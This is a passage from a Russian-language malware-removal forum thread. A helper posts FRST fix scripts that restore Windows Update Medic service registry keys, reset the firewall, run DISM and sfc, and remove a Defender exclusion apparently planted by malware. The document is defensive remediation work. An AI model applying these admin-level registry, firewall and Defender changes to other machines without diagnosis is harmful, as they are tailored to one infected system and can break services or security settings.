"Type"=dword:00000005
"Action"=dword:00000001
"Guid"=hex:c8,46,fb,54,89,f0,4c,46,b1,fd,59,d1,b6,2c,3b,50


EndRegedit:
StartRegedit:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc]
"DependOnService"=hex(7):72,00,70,00,63,00,73,00,73,00,00,00,00,00
"Description"="@WaaSMedicSvcImpl.dll,-101"
"DisplayName"="@WaaSMedicSvcImpl.dll,-100"
"ErrorControl"=dword:00000001
"FailureActions"=hex:84,03,00,00,00,00,00,00,00,00,00,00,03,00,00,00,14,00,00,\
  00,01,00,00,00,c0,d4,01,00,01,00,00,00,e0,93,04,00,00,00,00,00,00,00,00,00
"ImagePath"=hex(2):25,00,73,00,79,00,73,00,74,00,65,00,6d,00,72,00,6f,00,6f,00,\
  74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,\
  00,76,00,63,00,68,00,6f,00,73,00,74,00,2e,00,65,00,78,00,65,00,20,00,2d,00,\
  6b,00,20,00,77,00,75,00,73,00,76,00,63,00,73,00,20,00,2d,00,70,00,00,00
"LaunchProtected"=dword:00000002
"ObjectName"="LocalSystem"
"RequiredPrivileges"=hex(7):53,00,65,00,54,00,63,00,62,00,50,00,72,00,69,00,76,\
  00,69,00,6c,00,65,00,67,00,65,00,00,00,53,00,65,00,43,00,68,00,61,00,6e,00,\
  67,00,65,00,4e,00,6f,00,74,00,69,00,66,00,79,00,50,00,72,00,69,00,76,00,69,\
  00,6c,00,65,00,67,00,65,00,00,00,53,00,65,00,49,00,6d,00,70,00,65,00,72,00,\
  73,00,6f,00,6e,00,61,00,74,00,65,00,50,00,72,00,69,00,76,00,69,00,6c,00,65,\
  00,67,00,65,00,00,00,53,00,65,00,54,00,61,00,6b,00,65,00,4f,00,77,00,6e,00,\
  65,00,72,00,73,00,68,00,69,00,70,00,50,00,72,00,69,00,76,00,69,00,6c,00,65,\
  00,67,00,65,00,00,00,53,00,65,00,53,00,65,00,63,00,75,00,72,00,69,00,74,00,\
  79,00,50,00,72,00,69,00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,53,00,65,\
  00,42,00,61,00,63,00,6b,00,75,00,70,00,50,00,72,00,69,00,76,00,69,00,6c,00,\
  65,00,67,00,65,00,00,00,53,00,65,00,52,00,65,00,73,00,74,00,6f,00,72,00,65,\
  00,50,00,72,00,69,00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,53,00,65,00,\
  4d,00,61,00,6e,00,61,00,67,00,65,00,56,00,6f,00,6c,00,75,00,6d,00,65,00,50,\
  00,72,00,69,00,76,00,69,00,6c,00,65,00,67,00,65,00,00,00,00,00
"ServiceSidType"=dword:00000001
"Start"=dword:00000003
"Type"=dword:00000020

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc\Parameters]
"ServiceDll"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,\
  00,74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,\
  57,00,61,00,61,00,53,00,4d,00,65,00,64,00,69,00,63,00,53,00,76,00,63,00,2e,\
  00,64,00,6c,00,6c,00,00,00
"ServiceDllUnloadOnStop"=dword:00000001
"ServiceMain"="ServiceMain"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc\Security]
"Security"=hex:01,00,14,80,78,00,00,00,84,00,00,00,14,00,00,00,30,00,00,00,02,\
  00,1c,00,01,00,00,00,02,80,14,00,ff,00,0f,00,01,01,00,00,00,00,00,01,00,00,\
  00,00,02,00,48,00,03,00,00,00,00,00,14,00,9d,00,02,00,01,01,00,00,00,00,00,\
  05,0b,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,\
  20,02,00,00,00,00,14,00,ff,01,0f,00,01,01,00,00,00,00,00,05,12,00,00,00,01,\
  01,00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00


EndRegedit:
Reg: reg export HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Defaults\FirewallPolicy\FirewallRules C:\Firewall.reg
C:\Firewall.reg
CMD: netsh advfirewall reset
CMD: DISM.exe /Online /Cleanup-image /Restorehealth
CMD: sfc /scannow
CMD: findstr /c:"[SR]" %windir%\Logs\CBS\CBS.log >"%userprofile%\Desktop\sfcdetails.txt" 
CMD: type "%userprofile%\Desktop\sfcdetails.txt"
CMD: del /q "%userprofile%\Desktop\sfcdetails.txt"
ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
Zip: C:\FRST\Quarantine
EmptyTemp:
Reboot:
End::

Скопируйте выделенный текст (правой кнопкой - Копировать).
Запустите FRST (FRST64) от имени администратора.
Нажмите Fix (Исправить) один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Запакуйте его в архив и прикрепите к своему следующему сообщению. Вставлять код никуда не нужно - он будет выполнен из буфера обмена.
Компьютер будет перезагружен автоматически.

Наверх

#14 ap0logies

Newbie

Posters
9 Сообщений:

Отправлено 14 Сентябрь 2025 - 21:34

Вот

Прикрепленные файлы:

Fixlog.txt 98,99К 2 Скачано раз

Сообщение было изменено ap0logies: 14 Сентябрь 2025 - 21:35

Наверх

#15 Severnyj

Member

Posters
255 Сообщений:

Отправлено 14 Сентябрь 2025 - 21:46

Еще вот такой скрипт FRST выполните (моя невнимательность, пропустил "слэш")

Start::

StartPowershell:
Remove-MpPreference -ExclusionPath "C:\ProgramData\"
EndPowerShell:

ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
End::

Fixlog.txt прикрепите.

Сообщите, что с проблемой?